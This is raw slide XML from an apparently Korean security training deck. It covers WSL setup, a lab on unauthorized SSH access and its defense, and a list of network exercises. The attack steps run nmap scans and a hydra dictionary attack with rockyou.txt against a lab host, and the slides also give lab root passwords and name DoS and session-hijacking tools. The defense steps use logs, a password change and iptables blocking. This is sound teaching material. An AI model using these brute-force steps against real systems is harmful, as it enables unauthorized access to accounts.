              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>버전을 확인한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –l -v</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12. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다음 페이지에서 커널 업데이트 패키지를 다운받는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>각 운영체제</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>cpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에 맞는 패키지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans KR"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Docs.Microsoft.com/ko-KR/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="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a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Noto Sans KR"/>
            </a:endParaRP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13. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다운받은 커널 패키지를 실행한다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/Training/Unit/Sys/14</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 14. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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endParaRPr lang="ko-KR" altLang="en-US" sz="100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공격</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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endParaRPr lang="ko-KR" altLang="en-US" sz="100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터미널 실행</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>2) ifconfig </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>명령으로 공격 서버가 위치한 네트워크 주소 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># ifconfig</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>으로 네트워크 스캔</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>sP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> 10.10.1.0/24</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hydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 사전 공격 수행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># hydra –l test01 –P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/share/wordlists/rockyou.txt ssh://10.10.1.14</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>획득한 계정 정보로 로그인 시도</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>test01@10.10.1.14</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6) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>종료</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># exit</a:t>
            </a:r>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a:t>1) acheck </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>및 알아낸 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>test01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>계정의 비밀번호 입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># acheck</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>test123</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/Training/Unit/Sys/14</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 14. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>비인가 접근 공격 및 방어 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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Linux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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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en-US" altLang="ko-KR" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> –c 200 –w packet.txt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2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> –w packet.txt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3) iptables</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en-US" altLang="ko-KR"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 INPUT -s [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>차단</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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보안 로그 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>tshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>의 원격접속 패킷 저장 후 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># tail /var/log/secure</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IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>주소가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>192.168.1.169</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>test01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>계정으로 로그인 시도를 하고 있음 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>해당 계정의 비밀번호 변경</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># passwd test01</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>무작위 공격 시도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>차단</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># iptables –A INPUT –s IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>주소 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>–j DROP</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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 action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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NIS(+)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err="1">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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>mailx</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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>WireShark</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>, OpenSSL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err="1">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err="1">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err="1">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DNS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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>WireShark</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>, top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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>WireShark</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>iftop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Ping of Death</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Saddam.py</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Slowloris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RUDY</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snort, iptables </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hunt-1.5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Hijacking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MITM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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>네트워크</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 문제 리스트</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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/Training/Unit/Net/0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 0. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>실습 구성도</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 1. NIS(+) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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NIS(Network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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>RPC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이 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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>NIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>범위안의 네트워크에서만 수용 할 수 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en-US" altLang="ko-KR" sz="1000" kern="0" spc="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2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> :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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>NIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>NIS</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server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 계정 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>: root / toor</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>클라이언트</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6.5 / 10.10.1.133)</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10.10.1.166(NIS Server) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>접속 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(PW : toor)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>    # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> root@10.10.1.166</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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>터미널을 하나 더 실행시켜서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>10.10.1.133(NIS Client) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>접속 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(PW : root123)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>    # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> root@10.10.1.133</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10.10.1.166(NIS Server)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>nis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서비스 재시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>init.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/nis restart</a:t>
            </a:r>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10.10.1.133(NIS Client)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>nis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서버로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>ypbind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
